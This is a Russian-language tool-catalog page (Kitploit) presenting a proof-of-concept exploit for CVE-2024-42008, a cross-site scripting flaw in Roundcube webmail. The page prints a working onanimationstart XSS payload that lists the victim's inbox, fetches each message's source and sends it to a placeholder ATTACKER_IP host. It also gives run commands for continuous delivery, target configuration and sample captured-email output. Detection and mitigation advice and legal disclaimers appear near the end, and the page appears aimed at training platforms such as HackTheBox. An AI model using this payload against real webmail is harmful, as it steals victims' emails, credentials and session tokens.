Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Roundcube-CVE-2024-42008-POC — Концепт-эксплойт для CVE-2024-42008, уязвимости межсайтового скриптинга (XSS) в веб-почте RoundCube. Доставляет XSS-пейлоады через контактные формы для кражи писем, учётных данных и сессионных токенов в авторизованных средах тестирования на проникновение. | Kitploit
Инструменты/GitHubGitHub/rpgsec/roundcube-cve-2024-42008-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингCTFОбучение и Образование
GitHubrpgsec/roundcube-cve-2024-42008-poc

Roundcube-CVE-2024-42008-POC

Концепт-эксплойт для CVE-2024-42008, уязвимости межсайтового скриптинга (XSS) в веб-почте RoundCube. Доставляет XSS-пейлоады через контактные формы для кражи писем, учётных данных и сессионных токенов в авторизованных средах тестирования на проникновение.

Репозиторий
191 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-42008 RoundCube XSS Эксплойт

Обзор

Этот репозиторий содержит proof-of-concept эксплойт для CVE-2024-42008, уязвимости межсайтового выполнения сценариев (XSS) в веб-почтовом приложении RoundCube. Данный эксплойт предназначен для образовательных целей и контролируемых сред тестирования на проникновение, таких как HackTheBox.

Детали уязвимости

Краткое описание CVE-2024-42008

  • CVE ID: CVE-2024-42008
  • Тип: Межсайтовое выполнение сценариев (XSS)
  • Оценка CVSS: Высокий
  • Затронутые версии:
    • RoundCube ≤ 1.5.7
    • RoundCube 1.6.x ≤ 1.6.7
  • Исправленные версии: 1.5.8, 1.6.8+

Технические детали

Уязвимость существует в rcmail_action_mail_get->run() и позволяет удаленным злоумышленникам выполнять произвольный JavaScript в браузерах жертв. Недостаток связан с недостаточной проверкой входных данных при обработке содержимого электронной почты, особенно в контексте обработки CSS-анимаций и выполнения JavaScript.

Ключевой вектор атаки:

  • Вредоносное HTML-содержимое, внедренное через контактные формы или сообщения электронной почты
  • Свойства CSS-анимации, используемые для запуска выполнения JavaScript
  • Обработчики событий onanimationstart, обходящие фильтры содержимого
  • JavaScript-нагрузка выполняется в контексте веб-почтового приложения

Воздействие

Успешная эксплуатация позволяет злоумышленникам:

  • Похищать электронные письма жертвы из ВХОДЯЩИХ и других папок
  • Извлекать метаданные писем (UID, списки сообщений)
  • Получать доступ к исходному коду писем и вложениям
  • Отправлять письма от имени жертвы
  • Собирать учетные данные для входа и токены сессий
  • Выполнять действия от имени жертвы

Анализ скрипта эксплойта

Архитектура скрипта

Эксплойт состоит из трех основных компонентов:

  1. Доставка XSS-нагрузки: Отправляет вредоносный HTML через контактную форму
  2. HTTP-сервер: Прослушивает извлеченные данные
  3. Обработка данных: Захватывает и регистрирует украденные письма

Разбор нагрузки

root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
  // 1. Fetch email list from victim's INBOX
  fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
  .then(r=>r.text())
  .then(t=>{
    // 2. Extract email UIDs using regex
    [...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
      // 3. For each email, fetch full source
      fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
      .then(r=>r.text())
      .then(data=>{
        // 4. Exfiltrate email data to attacker server
        fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
      })
    })
  })
; foo=bar">

Ключевые особенности

  • Непрерывная работа: Возможность отправки нагрузок через регулярные интервалы
  • Стелс-режим: Минимальный след и обработка ошибок
  • Логирование данных: Автоматический захват и сохранение извлеченных писем
  • Режим отладки: Поддержка прокси для анализа трафика
  • Настраиваемость: Несколько параметров командной строки

Использование

Предварительные требования

root@kitploit:~
pip install requests

Базовое использование

root@kitploit:~
# Однократная отправка нагрузки
python cve-2024-42008-exploit.py

# Непрерывный режим (каждые 30 секунд)
python cve-2024-42008-exploit.py -c

# Пользовательский интервал (каждые 60 секунд)
python cve-2024-42008-exploit.py -c -i 60

# Режим отладки с прокси
python cve-2024-42008-exploit.py -d

Конфигурация

Отредактируйте скрипт для настройки:

  • ATTACKER_IP: IP вашего прослушивающего сервера
  • ATTACKER_PORT: Порт для приема извлеченных данных
  • RECIPIENT_EMAIL: Целевой адрес электронной почты
  • TARGET_URL: Уязвимый экземпляр RoundCube
  • PROXY: Прокси-сервер для отладки (Burp Suite/Caido)

Параметры командной строки

ОпцияОписание
-d, --debugВключить режим отладки с поддержкой прокси
-c, --continuousОтправлять нагрузки непрерывно
-i, --intervalИнтервал между нагрузками (по умолчанию: 30с)

Порядок атаки

  1. Внедрение нагрузки: Скрипт отправляет вредоносный HTML через контактную форму
  2. Доставка письма: Уязвимый RoundCube обрабатывает и доставляет письмо
  3. Взаимодействие жертвы: Пользователь открывает/просматривает вредоносное письмо
  4. Выполнение XSS: CSS-анимация запускает JavaScript-нагрузку
  5. Извлечение данных: JavaScript похищает письма и отправляет их злоумышленнику
  6. Захват данных: Сервер эксплойта получает и регистрирует украденные данные

Обнаружение и смягчение

Для защитников

Индикаторы обнаружения:

  • Необычные свойства CSS-анимации в содержимом письма
  • Обработчики событий onanimationstart в HTML
  • Подозрительный JavaScript в сообщениях электронной почты
  • Исходящие запросы к неизвестным доменам из веб-почты
  • Повторные отправки контактных форм

Стратегии смягчения:

  • Обновите RoundCube до версии 1.5.8 или 1.6.8+
  • Внедрите политику безопасности контента (CSP)
  • Включите фильтрацию содержимого электронной почты
  • Отслеживайте подозрительный исходящий трафик
  • Регулярные аудиты безопасности конфигураций веб-почты

Для пентестеров

Рекомендации по тестированию:

  • Убедитесь в наличии соответствующего разрешения перед тестированием
  • Документируйте все действия для отчетности
  • Тестируйте только в изолированных средах
  • Убедитесь, что цель намеренно уязвима
  • Следуйте практике ответственного раскрытия

Правовые и этические соображения

⚠️ ПРЕДУПРЕЖДЕНИЕ: Данный эксплойт предоставляется только для образовательных целей и авторизованного тестирования.

  • Используйте только на системах, которыми владеете или имеете явное разрешение на тестирование
  • Предназначен для HackTheBox и аналогичных учебных платформ
  • Несанкционированное использование может нарушать местные и международные законы
  • Всегда следуйте практике ответственного раскрытия
  • Уважайте законы о конфиденциальности и защите данных

Технические ссылки

  • CVE-2024-42008 Official Entry
  • RoundCube Security Advisory
  • CWE-79: Cross-site Scripting

Пример вывода

root@kitploit:~
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200

[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log

Отказ от ответственности

Данный код предоставляется только для образовательных целей и авторизованного тестирования на проникновение. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный данным программным обеспечением. Всегда убедитесь, что у вас есть соответствующие разрешения перед тестированием любой системы.

Скачать инструмент